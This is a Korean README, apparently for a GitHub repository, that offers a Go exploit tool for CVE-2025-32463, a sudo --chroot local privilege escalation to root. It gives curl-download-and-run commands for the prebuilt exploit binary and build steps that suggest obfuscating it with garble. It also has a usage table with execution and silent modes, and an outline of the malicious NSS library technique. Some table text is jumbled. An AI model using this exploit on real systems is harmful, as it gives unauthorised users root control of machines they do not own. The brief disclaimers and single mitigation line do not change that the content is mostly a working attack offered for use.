
이 CVE는 sudo 버전 1.9.14부터 1.9.17까지의 취약점을 다루며, 권한이 없는 로컬 사용자가 루트 권한으로 상승할 수 있도록 합니다.
이 저장소는 sudo 버전 1.9.14~1.9.17에서 발견된 심각한 로컬 권한 상승 취약점(CVSS 9.3)인 CVE-2025-32463을 위한 Go 기반 익스플로잇 도구를 제공합니다. 이 취약점은 --chroot (-R) 옵션의 결함을 악용하여 인증되지 않은 로컬 사용자가 루트 권한을 획득할 수 있게 합니다.
⚠️ 경고: 교육 및 테스트 목적으로만 사용하십시오. 격리된 환경(예: VM)에서 사용하세요. 악의적인 용도로 사용하지 마십시오.
--chroot 권한이 있는 비특권 사용자curl -L https://github.com/Nowafen/CVE-2025-32463/releases/download/exploit/exploit -o exploit
chmod +x exploit
./exploit --execution # 루트 셸 실행
git clone https://github.com/Nowafen/CVE-2025-32463.git
cd CVE-2025-32463
go build -o exploit # 또는 garble을 사용하여 난독화
./exploit --execution
| 명령어 | 설명 |
|---|---|
./exploit --help | 사용법 도움말 표시 |
./exploit --about | CVE 세부 정보 표시 |
./exploit --execution |
확인: 루트 셸에서 id를 실행하면 uid=0(root)가 표시되거나 whoami를 실행하면 root가 표시됩니다.
/tmp/sudowoot.stage.* 생성woot1337.c) 생성libnss_/woot1337.so.2)로 컴파일sudo -R woot woot 실행하여 라이브러리 로드 및 권한 상승/etc/sudoers에 Defaults !use_chroot 추가이 도구는 보안 연구를 위한 것입니다. 작성자는 오용에 대해 책임을 지지 않습니다. 항상 책임감 있게 테스트하십시오.
제작: MNM
| 익스플로잇 실행 (루트 셸 열기) |
./exploit --execution --silent | 자동 모드 실행 |